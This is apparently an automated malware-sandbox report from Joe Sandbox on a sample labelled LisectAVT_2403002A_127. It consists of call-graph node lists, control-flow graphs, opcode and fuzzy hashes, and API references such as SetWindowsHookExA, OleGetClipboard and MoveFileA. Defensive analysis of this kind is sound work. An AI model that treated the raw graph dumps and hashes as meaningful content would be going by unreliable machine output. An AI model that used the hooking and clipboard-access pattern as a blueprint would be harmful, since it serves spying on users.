6cb0cac GetModuleHandleW 41862->41863 41862->41864 41863->41864 41864->41850 41866 6cb1a2e 41865->41866 41867 6cb0cac GetModuleHandleW 41866->41867 41868 6cb1a7a 41867->41868 41869 6cb0cac GetModuleHandleW 41868->41869 41870 6cb1af4 41868->41870 41871 6cb1ac8 41869->41871 41870->41850 41871->41870 41872 6cb0cac GetModuleHandleW 41871->41872 41872->41870 41873 176099b 41874 176091b 41873->41874 41875 176084e 41873->41875 41875->41874 41877 1761340 41875->41877 41879 1761343 41877->41879 41878 1761456 41878->41875 41879->41878 41884 6cb0023 41879->41884 41892 6cb0040 41879->41892 41900 1767d70 41879->41900 41904 1767d60 41879->41904 41885 6cb0052 41884->41885 41887 6cb0103 41885->41887 41908 6cb0288 41885->41908 41913 6cb0278 41885->41913 41886 6cb00c9 41919 6cb7d50 41886->41919 41923 6cb7d60 41886->41923 41887->41879 41893 6cb0052 41892->41893 41895 6cb0103 41893->41895 41896 6cb0288 GetModuleHandleW 41893->41896 41897 6cb0278 GetModuleHandleW 41893->41897 41894 6cb00c9 41898 6cb7d50 KiUserCallbackDispatcher 41894->41898 41899 6cb7d60 KiUserCallbackDispatcher 41894->41899 41895->41879 41896->41894 41897->41894 41898->41895 41899->41895 41902 1767d8f 41900->41902 41901 1767e4a 41901->41879 41902->41901 41955 176776c 41902->41955 41906 1767d70 41904->41906 41905 1767e4a 41905->41879 41906->41905 41907 176776c MoveFileA 41906->41907 41907->41905 41909 6cb0295 41908->41909 41927 6cb1208 41909->41927 41936 6cb11f3 41909->41936 41914 6cb0282 41913->41914 41916 6cb01d9 41913->41916 41917 6cb1208 GetModuleHandleW 41914->41917 41918 6cb11f3 GetModuleHandleW 41914->41918 41915 6cb02aa 41915->41886 41916->41886 41917->41915 41918->41915 41921 6cb7d68 41919->41921 41922 6cb7d8b 41921->41922 41951 6cb677c 41921->41951 41922->41887 41925 6cb7d68 41923->41925 41924 6cb677c KiUserCallbackDispatcher 41924->41925 41925->41924 41926 6cb7d8b 41925->41926 41926->41887 41928 6cb1233 41927->41928 41929 6cb0c9c GetModuleHandleW 41928->41929 41930 6cb129a 41929->41930 41934 6cb0c9c GetModuleHandleW 41930->41934 41945 6cb16e1 41930->41945 41931 6cb12b6 41932 6cb0cac GetModuleHandleW 41931->41932 41933 6cb12e2 41931->41933 41932->41933 41934->41931 41937 6cb1233 41936->41937 41938 6cb0c9c GetModuleHandleW 41937->41938 41939 6cb129a 41938->41939 41943 6cb0c9c GetModuleHandleW 41939->41943 41944 6cb16e1 GetModuleHandleW 41939->41944 41940 6cb12b6 41941 6cb0cac GetModuleHandleW 41940->41941 41942 6cb12e2 41940->41942 41941->41942 41943->41940 41944->41940 41946 6cb16f3 41945->41946 41947 6cb16f7 41945->41947 41946->41931 41948 6cb182e 41947->41948 41949 6cb193b GetModuleHandleW 41947->41949 41950 6cb19de GetModuleHandleW 41947->41950 41949->41948 41950->41948 41952 6cb7da0 KiUserCallbackDispatcher 41951->41952 41954 6cb7e0e 41952->41954 41954->41921 41956 1768288 MoveFileA 41955->41956 41958 1768327 41956->41958 41958->41901 41972 176f1e8 41973 176f22e GlobalMemoryStatusEx 41972->41973 41974 176f25e 41973->41974

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 521 6cc56a0-6cc56bd 522 6cc56bf-6cc56c2 521->522 523 6cc56de-6cc56e1 522->523 524 6cc56c4-6cc56d9 522->524 525 6cc56f4-6cc56f7 523->525 526 6cc56e3-6cc56e9 523->526 524->523 530 6cc56f9-6cc56fc 525->530 531 6cc5701-6cc5704 525->531 528 6cc581d-6cc5827 526->528 529 6cc56ef 526->529 534 6cc582e-6cc5830 528->534 529->525 530->531 532 6cc572c-6cc5732 531->532 533 6cc5706-6cc5709 531->533 537 6cc5749-6cc574f 532->537 538 6cc5734 532->538 535 6cc571a-6cc571d 533->535 536 6cc570b-6cc570f 533->536 540 6cc5835-6cc5838 534->540 545 6cc571f-6cc5722 535->545 546 6cc5727-6cc572a 535->546 543 6cc586e-6cc587b 536->543 544 6cc5715 536->544 541 6cc587c-6cc5888 537->541 542 6cc5755-6cc575d 537->542 539 6cc5739-6cc573c 538->539 547 6cc573e-6cc573f 539->547 548 6cc5744-6cc5747 539->548 549 6cc585c-6cc585e 540->549 550 6cc583a-6cc5857 540->550 560 6cc588a-6cc58ab 541->560 561 6cc58b7-6cc58b8 541->561 542->541 551 6cc5763-6cc5770 542->551 544->535 545->546 546->532 546->539 547->548 548->537 552 6cc577f-6cc5782 548->552 554 6cc5865-6cc5868 549->554 555 6cc5860 549->555 550->549 551->541 553 6cc5776-6cc577a 551->553 558 6cc5789-6cc578c 552->558 559 6cc5784-6cc5786 552->559 553->552 554->522 554->543 555->554 564 6cc578e-6cc579d 558->564 565 6cc57a2-6cc57a5 558->565 559->558 566 6cc58b5 560->566 562 6cc58b9-6cc58be 561->562 563 6cc58da-6cc58dd 561->563 567 6cc58bf-6cc58cc 562->567 568 6cc59aa-6cc59e4 562->568 569 6cc58ff-6cc5902 563->569 570 6cc58df-6cc58e3 563->570 564->565 572 6cc57a7-6cc57b0 565->572 573 6cc57b1-6cc57b4 565->573 566->561 567->568 576 6cc58cd-6cc58d9 567->576 591 6cc59e6-6cc59e9 568->591 578 6cc5924-6cc5927 569->578 579 6cc5904-6cc5908 569->579 570->568 577 6cc58e9-6cc58f1 570->577 574 6cc57b6-6cc57bc 573->574 575 6cc57c7-6cc57ca 573->575 574->530 581 6cc57c2 574->581 582 6cc57cc-6cc57d9 575->582 583 6cc57de-6cc57e1 575->583 576->563 577->568 585 6cc58f7-6cc58fa 577->585 587 6cc5929-6cc5930 578->587 588 6cc5937-6cc593a 578->588 579->568 586 6cc590e-6cc5916 579->586 581->575 582->583 592 6cc57fe-6cc5801 583->592 593 6cc57e3-6cc57f9 583->593 585->569 586->568 594 6cc591c-6cc591f 586->594 595 6cc59a2-6cc59a9 587->595 596 6cc5932 587->596 589 6cc593c-6cc594d 588->589 590 6cc5952-6cc5955 588->590 589->590 597 6cc5966-6cc5969 590->597 598 6cc5957-6cc5961 590->598 600 6cc59eb-6cc59fc 591->600 601 6cc5a07-6cc5a0a 591->601 592->526 602 6cc5807-6cc580a 592->602 593->592 594->578 596->588 604 6cc596b-6cc596f 597->604 605 6cc5983-6cc5986 597->605 598->597 620 6cc5d90-6cc5da3 600->620 621 6cc5a02 600->621 607 6cc5a0c-6cc5a13 601->607 608 6cc5a18-6cc5a1b 601->608 609 6cc580c-6cc5813 602->609 610 6cc5818-6cc581b 602->610 604->568 613 6cc5971-6cc5979 604->613 614 6cc5988-6cc598f 605->614 615 6cc5990-6cc5992 605->615 607->608 616 6cc5a1d-6cc5a2e 608->616 617 6cc5a35-6cc5a38 608->617 609->610 610->528 610->540 613->568 622 6cc597b-6cc597e 613->622 623 6cc5999-6cc599c 615->623 624 6cc5994 615->624 628 6cc5a64-6cc5a75 616->628 629 6cc5a30 616->629 618 6cc5a3a-6cc5a4b 617->618 619 6cc5a52-6cc5a55 617->619 618->607 633 6cc5a4d 618->633 625 6cc5a5f-6cc5a62 619->625 626 6cc5a57-6cc5a5c 619->626 621->601 622->605 623->566 623->595 624->623 625->628 632 6cc5a7c-6cc5a7f 625->632 626->625 628->607 641 6cc5a77 628->641 629->617 634 6cc5a9d-6cc5aa0 632->634 635 6cc5a81-6cc5a92 632->635 633->619 636 6cc5aab-6cc5c3f 634->636 637 6cc5aa2-6cc5aa5 634->637 635->607 642 6cc5a98 635->642 672 6cc5d75-6cc5d88 636->672 673 6cc5c45-6cc5c4c 636->673 637->636 640 6cc5d8b-6cc5d8e 637->640 640->620 643 6cc5da6-6cc5da9 640->643 641->632 642->634 643->636 645 6cc5daf-6cc5db2 643->645 646 6cc5db4-6cc5dbb 645->646 647 6cc5dc0-6cc5dc2 645->647 646->647 649 6cc5dc9-6cc5dcc 647->649 650 6cc5dc4 647->650 649->591 651 6cc5dd2-6cc5ddb 649->651 650->649 674 6cc5d00-6cc5d07 673->674 675 6cc5c52-6cc5c75 673->675 674->672 676 6cc5d09-6cc5d3c 674->676 684 6cc5c7d-6cc5c85 675->684 688 6cc5d3e 676->688 689 6cc5d41-6cc5d6e 676->689 686 6cc5c8a-6cc5ccb 684->686 687 6cc5c87 684->687 697 6cc5ccd-6cc5cde 686->697 698 6cc5ce3-6cc5cf4 686->698 687->686 688->689 689->651 697->651 698->651
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: bf16c0d231e4fc61b616eaa27d5a50c35f1b7f688d982dec29293f72d3558555
                                                  • Instruction ID: 52ad08190719ae1d97fed158ef53583f3f20a45ec6350d1ac7551fce961bfc99
                                                  • Opcode Fuzzy Hash: bf16c0d231e4fc61b616eaa27d5a50c35f1b7f688d982dec29293f72d3558555
                                                  • Instruction Fuzzy Hash: F522E075E102558FDF64DBA4C4806AEBBB2EF84320F60846ED845EB345DB35ED92CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e88982e87461a7699cc725aa168678bff63ff57086e9262fbdda2103d66d498e
                                                  • Instruction ID: 9ec3ec99432ebfa130824aac5ef20e391e348a69fae79bfa872cdc292b93cb01
                                                  • Opcode Fuzzy Hash: e88982e87461a7699cc725aa168678bff63ff57086e9262fbdda2103d66d498e
                                                  • Instruction Fuzzy Hash: 32E23634E00259CFDB64DB68D484A9DB7B2FF89314F54C5AED409AB251EB34EE81CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 75a4ec4dc5844ec32731760fac034be4679c39cafff20014f510a8034778bfb9
                                                  • Instruction ID: 179703e6724b3cac806eb84a5e52c50fa4af627cf66fbc31c293bc4515ebbdd5
                                                  • Opcode Fuzzy Hash: 75a4ec4dc5844ec32731760fac034be4679c39cafff20014f510a8034778bfb9
                                                  • Instruction Fuzzy Hash: E9629C34B002058FDB54DB69D694BADB7B2EF89324F24846DE806DB390DB35ED46CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 344d19a76e51f0b44118d72e3fb974ac2a99eb04286a38faa20ed55955ad3e08
                                                  • Instruction ID: 2c387e45666f74de8c9ba630413eb733d0fac000117b905f3f40498b2b6ee27b
                                                  • Opcode Fuzzy Hash: 344d19a76e51f0b44118d72e3fb974ac2a99eb04286a38faa20ed55955ad3e08
                                                  • Instruction Fuzzy Hash: B2327F34B1010A9FDB54DB69D890BADB7B2FB89324F10852DE409EB351DB39ED42CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 060a0a401b5bc2311b09e1b4198fa0ecc14947612a861ca33a931e34416dc9a2
                                                  • Instruction ID: 1a92185f4815ea69115a96a82f0847b49f1a9e9ee458cc9571f7c832963c6cf2
                                                  • Opcode Fuzzy Hash: 060a0a401b5bc2311b09e1b4198fa0ecc14947612a861ca33a931e34416dc9a2
                                                  • Instruction Fuzzy Hash: D1228134E101098FEF64CBA8D491BAEB7B6FB89320F64842EE445DB391DA35DD81CB51
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bc23e898e449f0cf66206880225002560e45129bb6b4b3d11f0d8a5762077d6
                                                  • Instruction ID: a480b28b2199027c4361195f774dba87c02a1419c86a3cae486ec8cf3a16ae7b
                                                  • Opcode Fuzzy Hash: 1bc23e898e449f0cf66206880225002560e45129bb6b4b3d11f0d8a5762077d6
                                                  • Instruction Fuzzy Hash: C002AF30B012168FDB54DB69E8946AEBBF2FF85314F24852DD4069B384DB35ED82CB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 701 6cb2ccd-6cb2d3e 702 6cb2d49-6cb2d50 701->702 703 6cb2d40-6cb2d46 701->703 704 6cb2d5b-6cb2d93 702->704 705 6cb2d52-6cb2d58 702->705 703->702 706 6cb2d9b-6cb2dfa CreateWindowExW 704->706 705->704 707 6cb2dfc-6cb2e02 706->707 708 6cb2e03-6cb2e3b 706->708 707->708 712 6cb2e48 708->712 713 6cb2e3d-6cb2e40 708->713 714 6cb2e49 712->714 713->712 714->714
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CB2DEA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 626861269223fadcb35d1e36ebea9834baa25e592e07e0f1d2e48e4d3c29274b
                                                  • Instruction ID: 65c3a12d04513d7c699ae44ad7f16000e5acadb99742b2736d72d5841d07c47c
                                                  • Opcode Fuzzy Hash: 626861269223fadcb35d1e36ebea9834baa25e592e07e0f1d2e48e4d3c29274b
                                                  • Instruction Fuzzy Hash: 6A51A0B1D00349DFDB14CFAAD884ADEBBF5BF48310F24952AE419AB210D7759986CF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 715 6cb2cd8-6cb2d3e 716 6cb2d49-6cb2d50 715->716 717 6cb2d40-6cb2d46 715->717 718 6cb2d5b-6cb2dfa CreateWindowExW 716->718 719 6cb2d52-6cb2d58 716->719 717->716 721 6cb2dfc-6cb2e02 718->721 722 6cb2e03-6cb2e3b 718->722 719->718 721->722 726 6cb2e48 722->726 727 6cb2e3d-6cb2e40 722->727 728 6cb2e49 726->728 727->726 728->728
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CB2DEA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 31e991ee3f22d6de62d14409b8f54e3c01ff8c6a1757ebcdb21307be2a84289a
                                                  • Instruction ID: 130cf0866a95b85aebe00c7868d537fdf267286cc6e5d2cd44f4543329925456
                                                  • Opcode Fuzzy Hash: 31e991ee3f22d6de62d14409b8f54e3c01ff8c6a1757ebcdb21307be2a84289a
                                                  • Instruction Fuzzy Hash: 2D41A0B1D00349DFDB14CFAAD884ADEFBB5BF48310F24912AE819AB210D7759945CF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 729 6cb6724-6cb7aa4 732 6cb7aaa-6cb7aaf 729->732 733 6cb7b54-6cb7b74 call 6cb0de4 729->733 735 6cb7b02-6cb7b3a CallWindowProcW 732->735 736 6cb7ab1-6cb7ae8 732->736 740 6cb7b77-6cb7b84 733->740 737 6cb7b3c-6cb7b42 735->737 738 6cb7b43-6cb7b52 735->738 743 6cb7aea-6cb7af0 736->743 744 6cb7af1-6cb7b00 736->744 737->738 738->740 743->744 744->740
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 06CB7B29
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: fb2fd7976872c13478e71448eaf4353c9b1483ba53ca3d50c9fb6ee890d68255
                                                  • Instruction ID: 157f38de731f2b049a4081c56725d9ef96746b151064599baf535037e8f4d50b
                                                  • Opcode Fuzzy Hash: fb2fd7976872c13478e71448eaf4353c9b1483ba53ca3d50c9fb6ee890d68255
                                                  • Instruction Fuzzy Hash: 1B4147B4900309CFDB54CF99C888AAAFBF5FF88314F249459E519AB321D374A945CFA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 746 6cba3a9-6cba3b0 747 6cba3b2-6cba3b4 746->747 748 6cba3e0-6cba42c 746->748 749 6cba33a 747->749 750 6cba3b6-6cba3db 747->750 752 6cba33c-6cba344 749->752 753 6cba346-6cba378 SetWindowsHookExA 749->753 750->748 752->753 754 6cba37a-6cba380 753->754 755 6cba381-6cba3a1 753->755 754->755
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CBA36B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: e52aee181c6b5cb3052879d2c4d6599d6ef035bf97f522c65ea04aae19613749
                                                  • Instruction ID: 748f24817fc568fa98943fbd72fca842a872485d6fcc5d9b56d4c1101d0a5fed
                                                  • Opcode Fuzzy Hash: e52aee181c6b5cb3052879d2c4d6599d6ef035bf97f522c65ea04aae19613749
                                                  • Instruction Fuzzy Hash: CE310131A042459FCB10DFA9E894AEEBBF1FF85310F14885ED0999B350CB30A904CF60

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 765 6cb87a4-6cb8800 767 6cb880a-6cb8848 OleGetClipboard 765->767 768 6cb884a-6cb8850 767->768 769 6cb8851-6cb889f 767->769 768->769 774 6cb88af 769->774 775 6cb88a1-6cb88a5 769->775 777 6cb88b0 774->777 775->774 776 6cb88a7 775->776 776->774 777->777
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 894ed84c56bfa0b701cc003b973b24c952ac8ce0a96020950af952f68e5cc5ef
                                                  • Instruction ID: d3e2c36ba6666681745ff88644e49218fd77bac475a56c1b28e1d96a2321492c
                                                  • Opcode Fuzzy Hash: 894ed84c56bfa0b701cc003b973b24c952ac8ce0a96020950af952f68e5cc5ef
                                                  • Instruction Fuzzy Hash: DE31F0B0D02209EFDB50CFA9C984BCEBBF5AF48714F24801AE504BB390C775A945CBA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 778 6cb8188-6cb8848 OleGetClipboard 781 6cb884a-6cb8850 778->781 782 6cb8851-6cb889f 778->782 781->782 787 6cb88af 782->787 788 6cb88a1-6cb88a5 782->788 790 6cb88b0 787->790 788->787 789 6cb88a7 788->789 789->787 790->790
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: f2a77514015cd02ce5df613a4ce93222f90f43355a2ea1d434c6c89a5ddf7f37
                                                  • Instruction ID: 863a2d5135f3e9a76b9d0b1338d71e27377c356761d256503244ec6c9387f5fa
                                                  • Opcode Fuzzy Hash: f2a77514015cd02ce5df613a4ce93222f90f43355a2ea1d434c6c89a5ddf7f37
                                                  • Instruction Fuzzy Hash: 313101B0D0230DDFDB50CF99C984BCEBBF5AB48704F24805AE504BB290D7B5A945CBA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 791 176776c-17682da 794 17682e5-17682e9 791->794 795 17682dc-17682e2 791->795 796 17682f1-1768325 MoveFileA 794->796 797 17682eb-17682ee 794->797 795->794 798 1768327-176832d 796->798 799 176832e-1768342 796->799 797->796 798->799
                                                  APIs
                                                  • MoveFileA.KERNEL32(?,00000000,?,?), ref: 01768318
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4573885582.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1760000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: a1ed159dd98c286356dc2d85751111280c4b80623b9622074d45b53ee1156f52
                                                  • Instruction ID: 2a01755d803d6944189a8942cbeaaec0a3fb1abbc69cb5442d23a1327a801a4d
                                                  • Opcode Fuzzy Hash: a1ed159dd98c286356dc2d85751111280c4b80623b9622074d45b53ee1156f52
                                                  • Instruction Fuzzy Hash: 292122B6C013099FCB50CF9AD984ADEFBF5FB88710F14805AE908BB214C3759944CBA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 801 6cb6bd0-6cb6bd6 802 6cb6bd8-6cb6c6c DuplicateHandle 801->802 803 6cb6c6e-6cb6c74 802->803 804 6cb6c75-6cb6c92 802->804 803->804
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06CB6C5F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: f97bc5b3cd9442b53585461de5fbdd209d276164ffa80cdf678342c0bd71fdb2
                                                  • Instruction ID: 0decd002fb031b26032cd4b69b9f86b02ba861472cc375a067cad05277600ac2
                                                  • Opcode Fuzzy Hash: f97bc5b3cd9442b53585461de5fbdd209d276164ffa80cdf678342c0bd71fdb2
                                                  • Instruction Fuzzy Hash: 6221F4B5900248EFDB10CFAAD984ADEBFF4FB48310F14801AE954A3310C374A944CF65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 807 1768280-17682da 810 17682e5-17682e9 807->810 811 17682dc-17682e2 807->811 812 17682f1-1768325 MoveFileA 810->812 813 17682eb-17682ee 810->813 811->810 814 1768327-176832d 812->814 815 176832e-1768342 812->815 813->812 814->815
                                                  APIs
                                                  • MoveFileA.KERNEL32(?,00000000,?,?), ref: 01768318
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4573885582.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1760000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 82126b09d9e88083adf4a9b0aa324cfdd637e73ff6397ae1b38d8ae9413eb27e
                                                  • Instruction ID: 663f8c5629261b304df7f3bd0368a4a045b1588857bf56595787f0b87d01b1b6
                                                  • Opcode Fuzzy Hash: 82126b09d9e88083adf4a9b0aa324cfdd637e73ff6397ae1b38d8ae9413eb27e
                                                  • Instruction Fuzzy Hash: 6E2124B6C013099FCB10CF99D984ADEFBF5FB88710F14805AE918AB215C3759945CBA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 817 176f1cf-176f226 820 176f22e-176f25c GlobalMemoryStatusEx 817->820 821 176f265-176f28d 820->821 822 176f25e-176f264 820->822 822->821
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0176F24F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4573885582.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1760000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 7aaa3da4811ec6e0a6d3ba595e40e576eed9fa1afebea87be2fe541d926fc723
                                                  • Instruction ID: 4785667a42ad8e6a8d959e36c048e3008aea893b9c5ab69441bf38198319ee06
                                                  • Opcode Fuzzy Hash: 7aaa3da4811ec6e0a6d3ba595e40e576eed9fa1afebea87be2fe541d926fc723
                                                  • Instruction Fuzzy Hash: 7D2156B1C0469ADFDB10CFAAC44879EFBF4AF48310F15816AE918B7241D378A945CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 825 6cb6bd8-6cb6c6c DuplicateHandle 826 6cb6c6e-6cb6c74 825->826 827 6cb6c75-6cb6c92 825->827 826->827
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06CB6C5F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 67234720864cb24de6bd43b606fec90517387217e465b66229526c69fcd337a4
                                                  • Instruction ID: a6c866b9e9a8d9ff6b48ce6c6d073bccc9d923741c237d4102419b035dc182c5
                                                  • Opcode Fuzzy Hash: 67234720864cb24de6bd43b606fec90517387217e465b66229526c69fcd337a4
                                                  • Instruction Fuzzy Hash: F321E4B5900249EFDB10CFAAD984ADEFBF8EB48310F14801AE914A3310D378A944CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 830 6cba2e8-6cba33a 834 6cba33c-6cba344 830->834 835 6cba346-6cba378 SetWindowsHookExA 830->835 834->835 836 6cba37a-6cba380 835->836 837 6cba381-6cba3a1 835->837 836->837
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CBA36B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 9f034343a8e5ce5e0b713e5ad3511cfd8777307f31ec007f02a83ac2d5a97029
                                                  • Instruction ID: af9569f75fbaec7f05a9c53e1103f68b0593a8d56585599b775fe3e39dfb6c8e
                                                  • Opcode Fuzzy Hash: 9f034343a8e5ce5e0b713e5ad3511cfd8777307f31ec007f02a83ac2d5a97029
                                                  • Instruction Fuzzy Hash: 712133B5D002099FDB14CF9AC844BEEFBF5FB88310F10842AE459A7250C774A945CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
